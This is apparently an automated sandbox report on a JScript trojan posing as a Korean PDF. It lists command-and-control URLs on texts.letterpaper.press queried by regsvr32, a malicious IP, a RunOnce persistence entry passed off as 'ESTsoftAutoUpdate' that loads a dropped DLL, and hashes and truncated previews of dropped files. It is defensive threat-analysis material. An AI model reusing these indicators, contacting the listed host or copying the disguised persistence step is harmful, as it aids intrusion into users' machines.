http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F	regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69M	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69L	regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190G~	regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190uN&	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190QN	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T	regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69C	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69Y	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69W	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190AC	regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190bm~5	regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190bK	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.452083262.0000022E20FB9000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.496611128.000001AC8D2AF000.00000004.00000001.sdmp	false		high
http://texts.letterpaper.press//?m=d&p1=8ace1190bO	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69O	regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69U	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T	regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69i	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190O$	regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace11902M)	regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190b7	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190wP	regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69k	regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190fb	regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190#~	regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69e	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190O-	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190bK	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190FN	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190v~	regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190gM	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69z	regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190Mt	regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69q	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69o	regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp	true		unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69n	regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69u	regsvr32.exe, 00000021.00000003.966532472.0000000003AD5000.00000004.00000001.sdmp	true		unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190_M	regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190bK6(	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190Et	regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F	regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190%	regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190&	regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190bJ(	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace11906L	regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190=t	regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190bKy(	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190lN/	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace11905t	regsvr32.exe, 00000021.00000003.660597879.0000000003B29000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190&M	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190?L	regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190b$(	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190csi	regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190qB	regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=cf	regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190I	regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190KP7	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190J	regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190K	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190mC	regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190dbyLb	regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190sMh	regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190B	regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190K8(	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190LM	regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace1190?	regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190db	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190lO)	regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190v	regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190y	regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190x	regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190	regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace11906	regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190z	regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190pLk	regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190o	regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=c&p1=8ace11902	regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190n	regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190q	regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190p	regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69pBm	regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://texts.letterpaper.press//?m=d&p1=8ace1190bt75	regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.17.5.224	texts.letterpaper.press	United States		14618	AMAZON-AESUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1558048
Start date:	25.08.2021
Start time:	10:56:19
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 14m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit (version 1803) with Office 2016 Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (Javascript) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winJSE@49/82@1/1
EGA Information:	Successful, ratio: 25%
HDC Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .jse Override analysis time to 240s for JS/VBS files not yet terminated
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.4.250, 80.67.82.80, 80.67.82.97, 173.222.108.210, 173.222.108.226, 23.211.4.86 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, a122.dscd.akamai.net, audownload.windowsupdate.nsatc.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Execution Graph export aborted for target powershell.exe, PID 304 because it is empty Execution Graph export aborted for target powershell.exe, PID 4168 because it is empty Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Report size getting too big, too many NtWriteFile calls found.

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Simulations

Behavior and APIs

Time	Type	Description
10:58:41	API Interceptor	26x Sleep call for process: RdrCEF.exe modified
10:58:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdate regsvr32.exe /s "C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll"
10:59:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdate regsvr32.exe /s "C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll"
10:59:05	API Interceptor	52x Sleep call for process: powershell.exe modified
10:59:22	API Interceptor	890x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
50.17.5.224	0D940AB1CBEA49E99693A0DDA4225D2316CDE9C38BD59.exe	Get hash	malicious	Browse	umbrelladownload.uno:40355/
	UKKDVVgdOm.exe	Get hash	malicious	Browse	www.cncode.pw/
	pc_setup_x86_x64_install.exe	Get hash	malicious	Browse	www.cncode.pw/
	pc_setup_x86_x64_install.exe	Get hash	malicious	Browse	www.cncode.pw/
	setup_x86_x64_install.exe	Get hash	malicious	Browse	www.cncode.pw/
	setup_x86_x64_install.exe	Get hash	malicious	Browse	www.cncode.pw/
	0fyvsE9LDC.exe	Get hash	malicious	Browse	mahetechasia.com/data/five/fre.php
	D99RHSOc04.exe	Get hash	malicious	Browse	mahetechasia.com/data/five/fre.php
	QYPe9LqvgN.exe	Get hash	malicious	Browse	mahetechasia.com/data/five/fre.php
	c679be2f_by_Libranalysis.exe	Get hash	malicious	Browse	www.cncode.pw/
	1905.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php
	1905.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php
	422d646c28b4fda4b6291e868342895495b714cba7638.exe	Get hash	malicious	Browse	0x21.in:8000/_az/
	inv_397145572_1781481758.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php
	inv_397145572_1781481758.xls	Get hash	malicious	Browse	revolet-sa.com/files/countryyelow.php
	EUR 11,464.00 955PLA3210970613.PDF.exe	Get hash	malicious	Browse	alfawood.us/mkdgs/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	S6DNzkh376	Get hash	malicious	Browse	44.200.82.219
	zoom.exe	Get hash	malicious	Browse	52.202.62.250
	E38HvGUw3W	Get hash	malicious	Browse	54.42.39.52
	https://ringernewunreadmsgscentral.weebly.com/	Get hash	malicious	Browse	52.55.193.46
	zEQyeKgNgG.exe	Get hash	malicious	Browse	54.208.186.182
	0824_7552110168.doc	Get hash	malicious	Browse	23.23.109.56
	0824_0646880414.doc	Get hash	malicious	Browse	54.235.91.189
	0824_0853746034.doc	Get hash	malicious	Browse	50.16.204.235
	0H2Z13Af7G.exe	Get hash	malicious	Browse	54.83.52.76
	QUqBgpQj3B	Get hash	malicious	Browse	54.45.200.219
	c0r0n4x.x86	Get hash	malicious	Browse	54.20.32.213
	tiS0LFl5Cd.exe	Get hash	malicious	Browse	208.80.202.60
	n038rUglDh.exe	Get hash	malicious	Browse	34.225.62.6
	VXS0UU2rgK.exe	Get hash	malicious	Browse	34.225.62.6
	jjy.dll	Get hash	malicious	Browse	50.16.246.238
	hhdA1DwNsD.exe	Get hash	malicious	Browse	54.235.247.117
	SKMBT 23082021 Ref MT103.exe	Get hash	malicious	Browse	3.223.115.185
	loligang.arm	Get hash	malicious	Browse	54.63.121.139
	Proforma invoiceShipping documents.exe	Get hash	malicious	Browse	35.153.154.128
	BXsIdfBOkg	Get hash	malicious	Browse	54.52.58.93

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\ 2021-05-07.pdf Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PDF document, version 1.4
Category:	dropped
Size (bytes):	21214792
Entropy (8bit):	7.953095259176038
Encrypted:	false
SSDEEP:	393216:qbyn6kZB5O7KbPSkc4a3r261YNaOo4D6vTu6bco6gcPvut:qbj2Y78PSX4aF1srocOTjwgcP2t
MD5:	ECA5B2616AEA464E9B623A91AED3B691
SHA1:	64D8E9C11253FA177FC45E439531C53C6830FC3C
SHA-256:	3251C02FF0FC90DCCD79B94FB2064FB3D7F870C69192AC1F10AD136A43C1CCEA
SHA-512:	E92E5013D43F4688DD61529A2E6D803A6FFF7036E9CE68AA9137730A2C32FC9A84A6901F4C4DA19A06985804DADB6320DECFF6B43EA8DE600AB41AF345542473
Malicious:	false
Preview:	%PDF-1.4.%..1 0 obj<</Pages 85 0 R /Outlines 17 0 R /Type /Catalog>>.endobj.2 0 obj.<</Type/Font /Subtype/Type0 /BaseFont/.....,Bold /Encoding /KSC-EUC-H /DescendantFonts[3 0 R]>>endobj.3 0 obj.<</Type /CIDFont /Subtype /CIDFontType0 /BaseFont /.....,Bold /CIDSystemInfo << /Registry(Adobe) /Ordering(Korea1) /Supplement 0>> /FontDescriptor 4 0 R /DW 500 /W [ 100 8000 1000 ] .>>.endobj.4 0 obj.<</Type /FontDescriptor /FontName /.....,Bold /Flags 32 /FontBBox[0 -154 1000 862]/ItalicAngle 0 /Ascent 858 /Descent 141 /CapHeight 861 /StemV 80.>>.endobj.5 0 obj.<</Type/Font /Subtype/Type0 /BaseFont/..... /Encoding /KSC-EUC-H /DescendantFonts[6 0 R]>>endobj.6 0 obj.<</Type /CIDFont /Subtype /CIDFontType0 /BaseFont /..... /CIDSystemInfo << /Registry(Adobe) /Ordering(Korea1) /Supplement 0>> /FontDescriptor 7 0 R /DW 500 /W [ 100 8000 1000 ] .>>.endobj.7 0 obj.<</Type /FontDescriptor /FontName /..... /Flags 32 /FontBBox[0 -154 1000 862]/ItalicAngle 0 /Ascent 858 /Descent 141 /CapHeight 86

C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	194560
Entropy (8bit):	7.923746161712757
Encrypted:	false
SSDEEP:	3072:skV6k74dhL0o0oqRT3vnkyVFTUwpsP+wqnsWtIN0KZehS5kxXhJhzYs/Hy9ehqk2:JR8rL0nn3vkyVFoVQZKZew5uXhJ+gy02
MD5:	14E01ED4D086206D3C4B7159DC887F25
SHA1:	2918B5AF300E979593DF44696E947DA396018532
SHA-256:	0A4F2CFF4D4613C08B39C9F18253AF0FD356697368EECDDF7C0FA560386377E6
SHA-512:	ED9A19513F27D40620C38EA9A18CAE3A8B806CDD6ACFA44D9FFF58FAEFD23D2D085E382B10412A01F6672304CBFB3D01AEDAFCF8DE7AB41E3CAFFDF069BD88E6
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............@...@...@...A...@...A+..@...A...@...@...@..8@...@U..A...@U..A...@...A...@U..A..@...A..@...A...@...@...@...A...@Rich...@................PE..d....H.`.........." ................0.....................................................`..................................................................p...)......................................................0...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................3.96.UPX!.$..

C:\ProgramData\Software\ESTsoft\Common\cache\log.txt.enc Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	154
Entropy (8bit):	6.67575050167768
Encrypted:	false
SSDEEP:	3:3lpBZiw/K9VgCMkitRJtkTdi7O4S5DiZtWgIp0sOC5sDIikXIAXhkk7:fz/YWt+iZS5Di3pIp0RCyD+hkk7
MD5:	98FC22F75BFE0B34F8347C82CB2F53BE
SHA1:	284BBCCF3AE04F1F7DCBD4AA3F6519E8BB8554C2
SHA-256:	F6F0B936933E69159CC3302FB9574554FF30894F3DC2FAC3A906A4EC226451BC
SHA-512:	E219F28F21CE7FCA13823BF6DE6A7D2B4B631C793446C95ACD029BDEFD5323AB18024D2E4F7BFCEE57F39D627E94EA89123BAE0EA6515C6FCCA9CEBBF9F6E8DD
Malicious:	false
Preview:	......LRk.K3=f(...?.x...d$l....\..P..6..?.....r.+..T......_........t.5."x_.f..k..06.:^...!K._.....E..L{.S.X.f7...7.4.&3.......$K=.(.C.......f..)..;A

C:\ProgramData\Software\ESTsoft\Common\cache\log.txt.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	PDF document, version 1.7
Category:	dropped
Size (bytes):	195
Entropy (8bit):	6.83803150109145
Encrypted:	false
SSDEEP:	3:Im7ml+/18LpJosoz8PCb6DEPAgI1B/zjZph8T8K+T2FW6PZ7G4uA1IUNgmpQaIvt:Iv+Up7oQLEnIJhExi+PZ7GSWspQFl5
MD5:	7DE2BF516E56542138ECCFEC08820070
SHA1:	12147AA70BA6B1D3B00C3AC8D11FC6FDD4ED69EB
SHA-256:	DC77A01DF0202C2872ED8DE3A13A071784D0172AF25CF2FB7170462027E48EA5
SHA-512:	252A1538D9E7F7C6D7D4B365262448BC543CE20CB4A569A67B9D38F58210D0509241DDB54FBAC988B3929A0B9680155069B7F36530BA9BF81867D35EB157C6E3
Malicious:	false
Preview:	%PDF-1.7..4 0 obj....$.....y.o&~2L..2.....5...mM.*/2.t..g=.>.KJc!..<x<e...O'3P......ZuK...Vm.!'...e.kPL...y.TZ...9x./....p.....33..2<^B#].a._wB.P...x...M.\.m.~..T..L,....'-).R.......6g

C:\ProgramData\Software\ESTsoft\Common\cache\log.txt.zip Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	22
Entropy (8bit):	1.0476747992754052
Encrypted:	false
SSDEEP:	3:pjt/l:Nt
MD5:	76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:	B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:	8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:	5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:	false
Preview:	PK....................

C:\ProgramData\Software\ESTsoft\Common\flags\FolderMonitor Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:b:b
MD5:	D7A7B80A25465364FE8715DD5AA607B6
